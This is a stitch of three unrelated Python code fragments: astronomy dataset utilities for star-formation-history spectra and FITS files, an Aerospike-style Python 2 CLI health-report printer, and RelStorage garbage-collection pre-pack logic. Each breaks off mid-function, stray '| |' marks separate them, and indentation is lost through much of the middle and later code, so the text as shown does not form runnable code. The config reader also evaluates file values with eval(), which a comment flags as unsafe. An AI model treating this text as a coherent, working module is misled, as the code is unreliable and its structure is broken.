    # Age-bin widths: midpoints between consecutive ages, closed by 0 at the
    # young end and magemax = 13.8 Gyr at the old end.
    age_separations = [0]
    age_separations += [(agevec[k + 1] + agevec[k]) / 2
                        for k in range(len(agevec) - 1)]
    age_separations.append(13.8e9)
    ageweights = [upper - lower
                  for lower, upper in zip(age_separations, age_separations[1:])]
    # NOTE(review): only `standardize_single_dataset` is imported at the top
    # of this file; `standardize_dataset` is presumably defined elsewhere in
    # this module — confirm.
    input_spectra, input_magnitudes, label_sfh, label_z = \
        standardize_dataset(input_spectra, input_magnitudes, label_sfh, label_z,
                            method_standardize_spectra=method_standardize_spectra,
                            method_standardize_magnitudes=method_standardize_magnitudes,
                            method_standardize_label_sfh=method_standardize_label_sfh,
                            method_standardize_label_z=method_standardize_label_z,
                            ageweights=ageweights)
    if verbose > 0:
        print(f"""
        Variable sizes:
            Input_spectra: {input_spectra.shape} - {convert_bytes(input_spectra.nbytes)}
            Input_magnitudes: {input_magnitudes.shape} - {convert_bytes(input_magnitudes.nbytes)}
            Label_sfh: {label_sfh.shape} - {convert_bytes(label_sfh.nbytes)}
            Label_z: {label_z.shape} - {convert_bytes(label_z.nbytes)}
        """)
    return input_spectra, input_magnitudes, label_sfh, label_z, spectra_lambda, agevec, ageweights
def verify32bits(filepath, verbose=1):
    """Ensure a FITS file stores single-precision (-32) data.

    A file written in double precision (BITPIX == -64) is converted to
    float32 in place and flushed back to disk.

    :param filepath: path of the FITS file to check.
    :param verbose: 1 -> short message (basename only); 2 -> full-path
        message plus a confirmation after the conversion.
    """
    with fits.open(filepath, mode="update") as hdul:
        # Already single precision: nothing to do.
        if hdul[0].header["bitpix"] != -64:
            return
        if verbose == 1:
            print(f"File ({os.path.basename(filepath)}) has BITPIX={hdul[0].header['bitpix']}.\n" +
                  f"Reducing to single precision (-32) ...")
        if verbose == 2:
            print(f"File ({filepath}) has BITPIX={hdul[0].header['bitpix']}.\n"
                  f"Reducing to single precision (-32) ...")
        # Reduce to -32 and persist the change.
        hdul[0].data = hdul[0].data.astype(np.float32)
        hdul.flush()
        if verbose == 2:
            print(f"Correctly reduced {os.path.basename(filepath)} to -32.")
def clean_line(idx_line, line_str):
    """Parse one config-file line into a (key, value) tuple of strings.

    Blank lines and full-line ``//`` comments yield None, as do malformed
    lines (anything without exactly one '='). A trailing ``//`` comment
    after the value is stripped before splitting.

    :param idx_line: line number, used only in the error message.
    :param line_str: raw text of the line.
    :return: ``(key, value)`` with surrounding whitespace removed, or None.
    """
    stripped = line_str.strip()
    # Skip blanks and full-line comments.
    if not stripped or stripped.startswith("//"):
        return None
    if stripped.count("=") != 1:
        print(f"[ERROR WHILE READING CONFIG FILE] line {idx_line} does not have a '"
              f"'valid number of '='. Line skipped.")
        return None
    # Drop any comment that follows the value on the same line.
    if "//" in stripped:
        stripped = stripped.split("//")[0]
    key, value = (part.strip() for part in stripped.split("="))
    return (key, value)
def getparametersfromid(filename, id_searched, verbose=0, returnfunction=False):
    """
    Returns the parameters that were used to generate a specific piece of
    information given an ID and the metadata file.
    It will verify if the metadata has the "Combined" parameter, in which
    case it will search for the subset id first.
    :param verbose: > 1 also dumps the whole metadata file; >= 1 prints the
        resulting parameter dictionary.
    :param filename: path of the JSON metadata file.
    :param id_searched: 1-based ID whose generating parameters are wanted.
    :param returnfunction: when True, also include the mass/Z function
        strings in the returned dictionary.
    :return: dictionary mapping parameter names to the values used for this ID.
    """
    # ToDo: Maybe verify UUIDs?
    # ToDo: Have an input that calls the R execution to generate the data again?
    # Open Metadata file
    with open(filename) as file_:
        data = json.load(file_)
        if verbose > 1:
            print(json.dumps(data, indent=4, sort_keys=True))
            pass
    # Verify if combined
    try:
        combined = data["Combined"]
    except KeyError:
        combined = False
    # If combined, look in which subset needs to be searched.
    # Additionally, look up which is the value that was added (and needs to be subtracted)
    id_subset = None
    if combined:
        # Last_ID holds the cumulative last ID of each subset, in order.
        for id_subset, last_id_this_subset in enumerate(data["Last_ID"]):
            if id_searched <= last_id_this_subset:
                break
        # Reduce id_searched according to the previous last_id, if id_subset > 0
        if id_subset > 0:
            id_searched -= data["Last_ID"][id_subset - 1]
        # Reduce data to subset for the search
        data = data[str(id_subset)]
    # Read parameters that will be used
    random_samples = data["randomSamples"][0]
    order_parameters = data["orderParameters"]
    massfunc_names = list(order_parameters.keys())
    accumulated_combinations = 0
    # Iterate over the different massfunc Names; the ID space is partitioned
    # contiguously across mass functions, in this order.
    for mfunc in massfunc_names:
        # Mass data for mfunc
        mass_data_mfunc = data["massParams"][mfunc]
        # Name of parameters (None marks a parameter absent from the metadata)
        mass_keys_mfunc = [x if x in list(mass_data_mfunc.keys()) else None for x in order_parameters[mfunc]["mass"]]
        # Possible values of parameters
        mass_parameters = [mass_data_mfunc[x] for x in mass_keys_mfunc]
        # Number of possible values for each parameters
        number_values_mass_parameters = [len(x) for x in mass_parameters]
        # Obtain same values for Z
        z_data_mfunc = data["ZParams"]
        z_keys_for_mfunc = [x if x in list(z_data_mfunc.keys()) else None for x in order_parameters[mfunc]["Z"]]
        z_parameters = [z_data_mfunc[x] for x in z_keys_for_mfunc]
        number_values_z_parameters = [len(x) for x in z_parameters]
        # Once all the data is recollected, number of cases are calculated
        # All the parameter names
        all_parameters = mass_keys_mfunc + z_keys_for_mfunc
        # Values of the parameters
        values_all_parameters = mass_parameters + z_parameters
        # How many parameters are there (+ randomSample)
        nparam = len(all_parameters) + 1
        # How many cases are there for each parameter
        number_all_parameters = number_values_mass_parameters + number_values_z_parameters + [random_samples]
        # Calculate how many iterations there are for every case:
        # number_combinations[i] is the stride of parameter i in the
        # mixed-radix encoding of the ID (built right-to-left).
        number_combinations = [0] * nparam
        number_combinations[-1] = random_samples + 1
        for i in reversed(range(nparam - 1)):
            number_combinations[i] = number_combinations[i + 1] * number_all_parameters[i]
        # Verify if ID is bigger than all possible combinations for this massfunc
        # If true, skip current massfunc and try with the next. Increase accumulated_combinations
        if id_searched > accumulated_combinations + number_combinations[0]:
            accumulated_combinations += number_combinations[0]
            continue
        # If smaller, it will stay with this massfunc
        current_id = id_searched - accumulated_combinations - 1
        idx_param = [0] * nparam
        for idx in range(nparam - 1):
            # Calculate from biggest to smallest the index of the parameter that was used.
            idx_param[idx] = int(current_id / number_combinations[idx + 1])
            current_id -= idx_param[idx] * number_combinations[idx + 1]
        # Add randomSample at the end (index 0 means "not a random sample")
        idx_param[-1] = current_id
        # Generate the final dictionary that will be returned
        final_dictionary = {"massfunction": mfunc}
        for f in range(nparam - 1):
            final_dictionary[all_parameters[f]] = values_all_parameters[f][idx_param[f]]
        if idx_param[-1] == 0:
            final_dictionary["randomSample"] = False
        else:
            final_dictionary["randomSample"] = True
        if verbose >= 1:
            print(final_dictionary)
        if returnfunction:
            final_dictionary["mfunction"] = mass_data_mfunc["func"]
            final_dictionary["zfunction"] = z_data_mfunc["func"]
        return final_dictionary
def read_config_file(filename, file_folder=None, reset_file=False, default_config_file="Data/default_config_file.txt"):
    """
    Read a configuration file and split its entries into generic and cross-validation parameters.

    If the file does not exist (or ``reset_file`` is True) a template is first
    copied from ``default_config_file`` so the user has something to edit.

    :param filename: name of the configuration file (must be a string)
    :param file_folder: folder containing the file; defaults to the current working directory
    :param reset_file: if True, overwrite the config file with the default template
    :param default_config_file: path to the template used to (re)create the config file
    :return: tuple ``(parameters, cv_parameters)`` of dictionaries with the evaluated values
    :raises KeyError: if ``filename`` is not a string (KeyError kept for backward compatibility)
    """
    if not isinstance(filename, str):
        # NOTE: TypeError would be more idiomatic, but existing callers may catch KeyError.
        raise KeyError("filename needs to be a string")
    if file_folder is None:
        file_folder = os.getcwd()
    # simplify full filename
    full_filename = os.path.join(file_folder, filename)
    # Check if file is there. If it isn't, generate a blank file from the information template.
    if not os.path.isfile(full_filename) or reset_file:
        print(f"[INFO] There is no config file. A template will be created at {full_filename} .")
        copyfile(default_config_file, full_filename)
        # ToDo: This path should be linked to the env_variable that reads where the data for the library is stored
    # Open file and read the configuration parameters.
    with open(full_filename, 'r') as f:
        lines = f.readlines()

    def _evaluated(raw):
        # Values are stored as python expressions; tuple values keep only their first element.
        # SECURITY NOTE: eval() executes arbitrary code from the config file --
        # only read config files from trusted locations.
        value = eval(raw)
        return value[0] if isinstance(value, tuple) else value

    # Verify syntax and clean the list. Entries after a truthy "CVParams"
    # marker go into the cross-validation dictionary instead of the generic one.
    cv_params = False
    cv_parameters = dict()
    parameters = dict()
    for idx, line in enumerate(lines):
        cleaned_line = clean_line(idx, line)
        if cleaned_line is None:
            continue
        if cleaned_line[0] == "CVParams" and eval(cleaned_line[1]):
            cv_params = True
            continue
        # NOTE: a falsy "CVParams" entry intentionally falls through and is
        # stored like any other parameter (preserves historical behaviour).
        target = cv_parameters if cv_params else parameters
        target[cleaned_line[0]] = _evaluated(cleaned_line[1])
    return parameters, cv_parameters
def combine_datasets(file_list_sufixes: list, file_folder="", combined_output_sufix: str = "combined", overwrite=True,
whichrscript: str = "/usr/local/bin/Rscript"):
"""
Combines n datasets into a single combined dataset, where n=len(file_list_sufixes).
The files are located in file_folder (relative or absolute path). The outputs will be stored in the same folder.
The three files will be called:
-Input_[combined_output_sufix].fits
-Label_[combined_output_sufix].fits
-MetaD_[combined_output_sufix].fits
:param file_list_sufixes: Suffixes should not contain extensions
:param file_folder:
:param combined_output_sufix:
:param overwrite:
:param whichrscript:
"""
# if the length of file_list_sufixes == ["all"], it will use all files.
if file_list_sufixes == ["all"]:
# Get all files
file_list_sufixes = os.listdir(file_folder)
# Filter only Inputs and keep only sufixes
file_list_sufixes = [_[6:-5] for _ in file_list_sufixes if _[0:6] == "Input_"]
# If combined is here, remove it
file_list_sufixes = [_ for _ in file_list_sufixes if _ != "combined"]
# Sort
file_list_sufixes.sort()
print(f"[INFO] All files in path are going | |
+= next_group
continue
elif next_group == '\n':
if prev_group != '\n':
next_peeked.append(next_group)
break
if highlight:
result += terminal.uninverse()
highlight = False
elif prev_group == next_group:
if highlight:
result += terminal.uninverse()
highlight = False
else:
if not highlight:
result += terminal.inverse()
highlight = True
result += next_group
if '\n' == prev_group and '\n' != next_group:
continue
break
for next_group in next_iterator:
if next_group == ' ' or next_group == '\n':
if highlight:
result += terminal.uninverse()
highlight = False
else:
if not highlight:
result += terminal.inverse()
highlight = True
result += next_group
if highlight:
result += terminal.reset()
highlight = False
result = "".join(result)
previous = output
else:
result = output
previous = output
ts = time.time()
st = datetime.datetime.fromtimestamp(
ts).strftime(' %Y-%m-%d %H:%M:%S')
command = " ".join(line)
print >> real_stdout, "[%s '%s' sleep: %ss iteration: %s" % (
st, command, sleep, count),
if num_iterations:
print >> real_stdout, " of %s" % (num_iterations),
print >> real_stdout, "]"
print >> real_stdout, result
if num_iterations and num_iterations <= count:
break
count += 1
time.sleep(sleep)
except (KeyboardInterrupt, SystemExit):
return
finally:
sys.stdout = real_stdout
print ''
###########################
### Health Print functions
###########################
@staticmethod
    def _print_data(d):
        """Print one health-result datum in the most readable form for its type.

        Tuples are printed as-is, dicts via print_dict, anything else via str().
        None is silently skipped.
        """
        if d is None:
            return
        if isinstance(d, tuple):
            print d
        elif isinstance(d, dict):
            print_dict(d)
        else:
            print str(d)
@staticmethod
    def _print_counter_list(data, header=None):
        """Print a list of counter entries, preceded by a separator line and an
        optional red bold header. Empty input prints nothing."""
        if not data:
            return
        print "\n" + ("_" * 100) + "\n"
        if header:
            print terminal.fg_red() + terminal.bold() + str(header) + " ::\n" + terminal.unbold() + terminal.fg_clear()
        for d in data:
            # _print_data handles tuples, dicts and plain values uniformly.
            CliView._print_data(d)
            print ""
@staticmethod
    def _print_status(status_counters, verbose=False):
        """Print the health-check summary counts (Total/Passed/Failed/Skipped).

        Skipped is derived: total queries minus failed minus passed.
        NOTE(review): `verbose` is currently unused -- kept for interface compatibility.
        """
        if not status_counters:
            return
        s = "\n" + terminal.bold() + "Summary".center(H_width, "_") + terminal.unbold()
        s += "\n" + CliView._get_header("Total") + CliView._get_msg([str(status_counters[HealthResultCounter.ASSERT_QUERY_COUNTER])])
        s += CliView._get_header("Passed") + CliView._get_msg([str(status_counters[HealthResultCounter.ASSERT_PASSED_COUNTER])])
        s += CliView._get_header("Failed") + CliView._get_msg([str(status_counters[HealthResultCounter.ASSERT_FAILED_COUNTER])])
        s += CliView._get_header("Skipped") + CliView._get_msg([str(status_counters[HealthResultCounter.ASSERT_QUERY_COUNTER]
                                                                    - status_counters[HealthResultCounter.ASSERT_FAILED_COUNTER]
                                                                    - status_counters[HealthResultCounter.ASSERT_PASSED_COUNTER])])
        print s
@staticmethod
    def _print_debug_messages(ho):
        """Best-effort printing of the debug messages in a health output object.

        All exceptions are deliberately swallowed: debug output must never
        break the main report.
        """
        try:
            for d in ho[HealthResultType.DEBUG_MESSAGES]:
                try:
                    # d is expected to be indexable: d[1] the label, d[2] the value -- TODO confirm
                    print "Value of %s:" % (d[1])
                    CliView._print_data(d[2])
                except Exception:
                    pass
        except Exception:
            pass
@staticmethod
    def _print_exceptions(ho):
        """Best-effort printing of the exceptions collected in a health output
        object, one counter list per exception category.

        All exceptions are deliberately swallowed so a malformed entry cannot
        abort the report.
        """
        try:
            for e in ho[HealthResultType.EXCEPTIONS]:
                try:
                    CliView._print_counter_list(
                        data=ho[HealthResultType.EXCEPTIONS][e], header="%s Exceptions" % (e.upper()))
                except Exception:
                    pass
        except Exception:
            pass
@staticmethod
def _get_header(header):
return "\n" + terminal.bold() + ("%s:" % header).rjust(H1_offset) + \
terminal.unbold() + " ".rjust(H2_offset - H1_offset)
@staticmethod
def _get_msg(msg, level=None):
if level is not None:
if level == AssertLevel.WARNING:
return terminal.fg_blue() + ("\n" + " ".rjust(H2_offset)).join(msg) + terminal.fg_clear()
elif level == AssertLevel.INFO:
return terminal.fg_green() + ("\n" + " ".rjust(H2_offset)).join(msg) + terminal.fg_clear()
else:
return terminal.fg_red() + ("\n" + " ".rjust(H2_offset)).join(msg) + terminal.fg_clear()
else:
return ("\n" + " ".rjust(H2_offset)).join(msg)
@staticmethod
def _format_value(val, formatting=True):
if not val or not formatting:
return val
if isinstance(val, int):
try:
# For python 2.7
return str(format(val, ',d'))
except Exception:
try:
# For python 2.6
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
return str(locale.format('%d', val, True))
except Exception:
pass
elif isinstance(val, float):
return_val = None
try:
# For python 2.7
return_val = format(val, ',f')
except Exception:
try:
# For python 2.6
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
return_val = locale.format('%f', val, True)
except Exception:
pass
if return_val is not None:
return_val = str(return_val)
if '.' in return_val:
return_val = return_val.rstrip('0')
return_val = return_val.rstrip('.')
return return_val
elif isinstance(val, str) and val.isdigit():
return CliView._format_value(int(val))
elif isinstance(val, str):
try:
val = float(val)
return CliView._format_value(val)
except Exception:
pass
return val
@staticmethod
def _get_kv_msg_list(kv_list):
if not kv_list:
return []
res_str = []
for kv in kv_list:
if not isinstance(kv, tuple):
res_str.append(str(kv))
continue
tmp_res_str = str(kv[0])
if kv[1] and isinstance(kv[1], list):
_str = None
for _kv in kv[1]:
if _kv:
try:
_str += ", " + ("%s:"%(str(_kv[0])) if len(str(_kv[0]).strip())>0 else "") + "%s"%(CliView._format_value(_kv[1], _kv[2]))
except Exception:
_str = ("%s:"%(str(_kv[0])) if len(str(_kv[0]).strip())>0 else "") + "%s"%(CliView._format_value(_kv[1], _kv[2]))
if _str:
tmp_res_str += " {%s}"%(_str)
if tmp_res_str:
res_str.append(tmp_res_str)
return res_str
@staticmethod
def _get_error_string(data, verbose=False, level=AssertLevel.CRITICAL):
if not data:
return "", 0
f_msg_str = ""
f_msg_cnt = 0
s_msg_str = ""
s_msg_cnt = 0
for d in data:
s = ""
if d[AssertResultKey.LEVEL] == level:
if d[AssertResultKey.SUCCESS]:
if d[AssertResultKey.SUCCESS_MSG]:
s_msg_str += CliView._get_header(d[AssertResultKey.CATEGORY][0]) + \
CliView._get_msg([d[AssertResultKey.SUCCESS_MSG]])
s_msg_cnt += 1
continue
s += CliView._get_header(d[AssertResultKey.CATEGORY][0]) + \
CliView._get_msg([d[AssertResultKey.FAIL_MSG]], level)
if verbose:
import textwrap
s += "\n"
s += CliView._get_header("Description:")
s += CliView._get_msg(textwrap.wrap(str(d[AssertResultKey.DESCRIPTION]), H_width - H2_offset,
break_long_words=False, break_on_hyphens=False))
s += "\n"
s += CliView._get_header("Keys:")
s += CliView._get_msg(CliView._get_kv_msg_list(d[AssertResultKey.KEYS]))
# Extra new line in case verbose output is printed
s += "\n"
f_msg_str += s
f_msg_cnt += 1
res_fail_msg_str = ""
if f_msg_cnt > 0:
res_fail_msg_str += f_msg_str
res_success_msg_str = ""
if s_msg_cnt > 0:
# res_success_msg_str = "\n\n"
# res_success_msg_str += (".".join(data[0]
# [AssertResultKey.CATEGORY]) + ":").ljust(25) + ""
res_success_msg_str += s_msg_str
return res_fail_msg_str, f_msg_cnt, res_success_msg_str, s_msg_cnt
@staticmethod
def _get_assert_output_string(assert_out, verbose=False, output_filter_category=[], level=AssertLevel.CRITICAL):
if not assert_out:
return ""
res_fail_msg_str = ""
total_fail_msg_cnt = 0
res_success_msg_str = ""
total_success_msg_cnt = 0
if not isinstance(assert_out, dict):
if not output_filter_category:
return CliView._get_error_string(assert_out, verbose, level=level)
else:
for _k in sorted(assert_out.keys()):
category = []
if output_filter_category:
if _k == output_filter_category[0]:
category = output_filter_category[1:] if len(
output_filter_category) > 1 else []
else:
category = output_filter_category
f_msg_str, f_msg_cnt, s_msg_str, s_msg_cnt = CliView._get_assert_output_string(
assert_out[_k], verbose, category, level=level)
res_fail_msg_str += f_msg_str
total_fail_msg_cnt += f_msg_cnt
res_success_msg_str += s_msg_str
total_success_msg_cnt += s_msg_cnt
return res_fail_msg_str, total_fail_msg_cnt, res_success_msg_str, total_success_msg_cnt
@staticmethod
    def _print_assert_summary(assert_out, verbose=False, output_filter_category=[], output_filter_warning_level=None):
        """Print PASS/FAIL summaries of the assert results, grouped by severity.

        :param assert_out: mapping of category -> (nested mapping or list of assert results)
        :param verbose: forwarded to _get_assert_output_string for detailed failures
        :param output_filter_category: optional category path used to filter the output
            (mutable default is safe: it is only read, never mutated)
        :param output_filter_warning_level: one of "CRITICAL"/"WARNING"/"INFO" to
            restrict output to a single severity; anything else shows all three
        """
        if not output_filter_warning_level:
            search_levels = [AssertLevel.INFO, AssertLevel.WARNING, AssertLevel.CRITICAL]
        elif output_filter_warning_level == "CRITICAL":
            search_levels = [AssertLevel.CRITICAL]
        elif output_filter_warning_level == "WARNING":
            search_levels = [AssertLevel.WARNING]
        elif output_filter_warning_level == "INFO":
            search_levels = [AssertLevel.INFO]
        else:
            search_levels = [AssertLevel.INFO, AssertLevel.WARNING, AssertLevel.CRITICAL]
        all_success_str = ""
        all_fail_str = ""
        all_fail_cnt = 0
        all_success_cnt = 0
        for level in search_levels:
            res_fail_msg_str = ""
            total_fail_msg_cnt = 0
            res_success_msg_str = ""
            total_success_msg_cnt = 0
            for _k in sorted(assert_out.keys()):
                if not assert_out[_k]:
                    continue
                category = []
                if output_filter_category:
                    # Consume the matching head of the filter path, or pass the
                    # whole filter down so deeper levels can still match.
                    if _k == output_filter_category[0]:
                        category = output_filter_category[1:] if len(
                            output_filter_category) > 1 else []
                    else:
                        category = output_filter_category
                f_msg_str, f_msg_cnt, s_msg_str, s_msg_cnt = CliView._get_assert_output_string(
                    assert_out[_k], verbose, category, level=level)
                if f_msg_str:
                    total_fail_msg_cnt += f_msg_cnt
                    res_fail_msg_str += f_msg_str
                if s_msg_str:
                    total_success_msg_cnt += s_msg_cnt
                    res_success_msg_str += s_msg_str
            if total_fail_msg_cnt > 0:
                # Severity banner: red for CRITICAL, blue for WARNING, green for INFO.
                summary_str = ""
                if level == AssertLevel.CRITICAL:
                    summary_str = terminal.bold() + terminal.fg_red() + str("%s" %
                        ("CRITICAL")).center(H_width, " ") + terminal.fg_clear() + terminal.unbold()
                elif level == AssertLevel.WARNING:
                    summary_str = terminal.bold() + terminal.fg_blue() + str("%s" %
                        ("WARNING")).center(H_width, " ") + terminal.fg_clear() + terminal.unbold()
                elif level == AssertLevel.INFO:
                    summary_str = terminal.bold() + terminal.fg_green() + str("%s" %
                        ("INFO")).center(H_width, " ") + terminal.fg_clear() + terminal.unbold()
                all_fail_str += "\n" + summary_str + "\n" + res_fail_msg_str + "\n"
                all_fail_cnt += total_fail_msg_cnt
            if total_success_msg_cnt > 0:
                all_success_str += res_success_msg_str
                all_success_cnt += total_success_msg_cnt
        if all_success_cnt > 0:
            print "\n\n" + terminal.bold() + str(" %s: count(%d) " %("PASS", all_success_cnt)).center(H_width, "_") + terminal.unbold()
            print all_success_str
        if all_fail_cnt > 0:
            print "\n\n" + terminal.bold() + str(" %s: count(%d) " %("FAIL", all_fail_cnt)).center(H_width, "_") + terminal.unbold()
            print all_fail_str
        print "_" * H_width + "\n"
@staticmethod
def print_health_output(ho, verbose=False, debug=False, output_file=None, output_filter_category=[], output_filter_warning_level=None):
if not ho:
return
o_s = None
if output_file is not None:
try:
o_s = open(output_file, "a")
sys.stdout = o_s
except Exception:
sys.stdout = sys.__stdout__
CliView._print_debug_messages(ho)
if debug:
CliView._print_exceptions(ho)
CliView._print_status(
ho[HealthResultType.STATUS_COUNTERS], verbose=verbose)
CliView._print_assert_summary(ho[HealthResultType.ASSERT], verbose=verbose,
output_filter_category=output_filter_category, output_filter_warning_level=output_filter_warning_level)
if o_s:
o_s.close()
sys.stdout = sys.__stdout__
###########################
@staticmethod
def get_summary_line_prefix(index, key):
s = " " * 3
s += str(index)
s += "." + (" " * 3)
s += key.ljust(19)
s += ":" + (" " * 2)
return s
@staticmethod
def _summary_namespace_table_view(stats, **ignore):
title = "Namespaces"
column_names = ('namespace', ('_devices', 'Devices (Total,Per-Node)'), ('_memory', 'Memory (Total,Used%,Avail%)'),
('_disk', 'Disk (Total,Used%,Avail%)'), ('repl_factor', 'Replication Factor'), ('cache_read_pct','Post-Write-Queue Hit-Rate'),
'rack-aware', ('master_objects', 'Master Objects'),
('license_data_in_memory', 'Usage (Unique-Data) In-Memory'), ('license_data_on_disk', 'Usage (Unique-Data) On-Disk')
)
t = Table(title, column_names, sort_by=0)
t.add_cell_alert(
'namespace',
lambda data: data['migrations_in_progress'],
color=terminal.fg_red
)
t.add_data_source_tuple(
'_devices',
lambda data:str(data['devices_total']),
lambda data:str(data['devices_per_node']))
t.add_data_source_tuple(
'_memory',
Extractors.byte_extractor('memory_total'),
lambda data:"%.2f"%data["memory_used_pct"],
lambda data:"%.2f"%data["memory_available_pct"])
t.add_data_source_tuple(
'_disk',
Extractors.byte_extractor('disk_total'),
lambda data:"%.2f"%data["disk_used_pct"],
lambda data:"%.2f"%data["disk_available_pct"])
t.add_data_source(
'repl_factor',
lambda data:",".join([str(rf) for rf in data["repl_factor"]])
)
t.add_data_source(
'master_objects',
Extractors.sif_extractor('master_objects')
)
t.add_data_source(
'license_data_in_memory',
Extractors.byte_extractor('license_data_in_memory')
)
t.add_data_source(
'license_data_on_disk',
Extractors.byte_extractor('license_data_on_disk')
)
for ns, ns_stats in stats.iteritems():
if isinstance(ns_stats, Exception):
row = {}
else:
row = ns_stats
row['namespace'] = ns
row['memory_used_pct'] = 100.00 - row['memory_available_pct']
t.insert_row(row)
CliView.print_result(t)
@staticmethod
def _summary_namespace_list_view(stats, **ignore):
print "Namespaces"
print | |
objects per minute, but 99% time
# spent in memmove().
#
# Using manual indexing of arrays, CPU usage of less than
# 35%; for the first time, 35% of profile time is spent in
# talking to MySQL (over gigabit switch); clearly parallel
# pre-fetching would be useful.
batch = oids[oids_done:oids_done + self.fill_object_refs_batch_size]
oids_done += len(batch)
refs_found = self._add_refs_for_oids(load_batcher, store_batcher,
batch, get_references)
num_refs_found += refs_found
self.on_fill_object_ref_batch(oid_batch=batch, num_refs_found=refs_found)
now = perf_counter()
if now >= log_at:
# Save the work done so far.
store_batcher.flush()
store_connection.commit()
log_at = now + self.fill_object_refs_commit_frequency
logger.info(
"pre_pack: objects analyzed: %d/%d (%d total references)",
oids_done, oid_count, num_refs_found)
# Those 30MM objects wound up with about 48,976,835 references.
store_batcher.flush()
store_connection.commit()
logger.info(
"pre_pack: objects analyzed: %d/%d", oids_done, oid_count)
    def _add_refs_for_oids(self, load_batcher, store_batcher,
                           oids, get_references):
        """
        Fill object_refs with the states for some objects.
        Returns the number of references added.

        :param load_batcher: batcher used to read object states in bulk
        :param store_batcher: batcher used to write/delete reference rows
        :param oids: OIDs to analyze (a slice of an ``OidList``)
        :param get_references: callable mapping a pickled state to the OIDs it references
        :return: number of rows added to ``object_ref``
        """
        # oids should be a slice of an ``OidList``, which may be an
        # ``array.array``; those are relatively slow to iterate.
        # The batcher always does deletes before inserts, which is
        # exactly what we want.
        # In the past, we performed all deletes and then all inserts;
        # now, things to batching, they could be interleaved, but
        # because we process OID-by-OID, that should be fine.
        # In the past, we also DELETED from object_refs_added and object_ref
        # everything found in the ``oids`` parameter; now we only do a delete if
        # we get back a row from object_state; again, that shouldn't matter, rows
        # should be found in object_state.
        object_ref_schema = store_batcher.row_schema_of_length(3)
        object_refs_added_schema = store_batcher.row_schema_of_length(2)
        # Use the batcher to get efficient ``= ANY()``
        # queries, but go ahead and collect into a list at once
        rows = list(load_batcher.select_from(
            ('zoid', 'tid', 'state'),
            'object_state',
            suffix=' ORDER BY zoid ',
            zoid=oids
        ))
        num_refs_found = 0
        for from_oid, tid, state in rows:
            state = self.driver.binary_column_as_state_type(state)
            row = (from_oid, tid)
            # Record that this oid has been analyzed at this tid...
            store_batcher.insert_into(
                'object_refs_added (zoid, tid)',
                object_refs_added_schema,
                row,
                row,
                size=2
            )
            # ...after clearing any stale bookkeeping/reference rows for it
            # (the batcher runs deletes before inserts).
            store_batcher.delete_from(
                'object_refs_added',
                zoid=from_oid
            )
            store_batcher.delete_from(
                'object_ref',
                zoid=from_oid
            )
            if state:
                try:
                    to_oids = get_references(state)
                except:
                    # Bare except is intentional: log details for *any* failure
                    # (even BaseException) before re-raising.
                    logger.exception(
                        "pre_pack: can't unpickle "
                        "object %d in transaction %d; state length = %d",
                        from_oid, tid, len(state)
                    )
                    raise
                for to_oid in to_oids:
                    row = (from_oid, tid, to_oid)
                    num_refs_found += 1
                    store_batcher.insert_into(
                        'object_ref (zoid, tid, to_zoid)',
                        object_ref_schema,
                        row,
                        row,
                        size=3
                    )
        return num_refs_found
@metricmethod
    def pre_pack(self, pack_tid, get_references):
        """
        Decide what the garbage collector should delete.
        Objects created or modified after pack_tid will not be garbage
        collected.
        get_references is a function that accepts a pickled state and
        returns a set of OIDs that state refers to.
        The self.options.pack_gc flag indicates whether to run garbage
        collection. If pack_gc is false, this method does nothing.
        """
        if not self.options.pack_gc:
            logger.warning("pre_pack: garbage collection is disabled on a "
                           "history-free storage, so doing nothing")
            return
        load_connection = LoadConnection(self.connmanager)
        store_connection = PrePackConnection(self.connmanager)
        try:
            try:
                self._pre_pack_main(load_connection, store_connection,
                                    pack_tid, get_references)
            except:
                # Bare except is intentional: roll back on *any* failure
                # (even BaseException) before re-raising.
                logger.exception("pre_pack: failed")
                store_connection.rollback_quietly()
                raise
            else:
                store_connection.commit()
                logger.info("pre_pack: finished successfully")
        finally:
            # Both connections are always released, success or failure.
            load_connection.drop()
            store_connection.drop()
    def _pre_pack_main(self, load_connection, store_connection,
                       pack_tid, get_references):
        """
        Determine what to garbage collect.

        *load_connection* is a
        :class:`relstorage.adapters.connections.LoadConnection`; this
        connection is in "snapshot" mode and is used to read a
        consistent view of the database. Although this connection is
        never committed or rolled back while this method is running
        (which may take a long time), because load connections are
        declared to be read-only the database engines can make certain
        optimizations that reduce the overhead of them (e.g.,
        https://dev.mysql.com/doc/refman/5.7/en/innodb-performance-ro-txn.html),
        making long-running transactions less problematic. For
        example, while packing a 60 million row single MySQL storage
        with ``zc.zodbdgc``, a load transaction was open and actively
        reading for over 8 hours while the database continued to be
        heavily written to without causing any problems.

        *store_connection* is a standard read-committed store connection;
        it will be periodically committed.

        :param pack_tid: objects changed after this tid are always kept
        :param get_references: callable mapping a pickled state to referenced OIDs
        """
        # First, fill the ``pack_object`` table with all known OIDs
        # as they currently exist in the database, regardless of
        # what the load_connection snapshot can see (which is no later
        # and possibly earlier, than what the store connection can see).
        #
        # Mark things that need to be kept:
        # - the root object;
        # - anything that has changed since ``pack_tid``;
        # Note that we do NOT add items that have been newly added since
        # ``pack_tid``; no need to traverse into them, they couldn't possibly
        # have a reference to an older object that's not also referenced
        # by an object in the snapshot (without the app doing something seriously
        # wrong): plus, we didn't find references from that item anyway.
        #
        # TODO: Copying 30MM objects takes almost 10 minutes (600s)
        # against mysql 8 running on an SSD, and heaven forgive you if
        # you kill the transaction and roll back --- the undo info is
        # insane. What if we CREATE AS SELECT a table? Doing 'CREATE
        # TEMPORARY TABLE AS' takes 173s; doing 'CREATE TABLE AS'
        # takes 277s.
        #
        # On PostgreSQL we could use unlogged tables; this is somewhat faster
        # in some tests (15 minutes vs 12?)
        logger.info("pre_pack: filling the pack_object table")
        stmt = """
        %(TRUNCATE)s pack_object;
        INSERT INTO pack_object (zoid, keep, keep_tid)
        SELECT zoid, CASE WHEN tid > %(pack_tid)s THEN %(TRUE)s ELSE %(FALSE)s END, tid
        FROM object_state;
        -- Also keep the root
        UPDATE pack_object
        SET keep = %(TRUE)s
        WHERE zoid = 0;
        """
        self.runner.run_script(store_connection.cursor, stmt, {'pack_tid': pack_tid})
        store_connection.commit()
        logger.info("pre_pack: Filled the pack_object table")
        # Chase down all the references using a consistent snapshot, including
        # only the objects that were visible in ``pack_object``.
        self.fill_object_refs(load_connection, store_connection, get_references)
        # Traverse the graph, setting the 'keep' flags in ``pack_object``
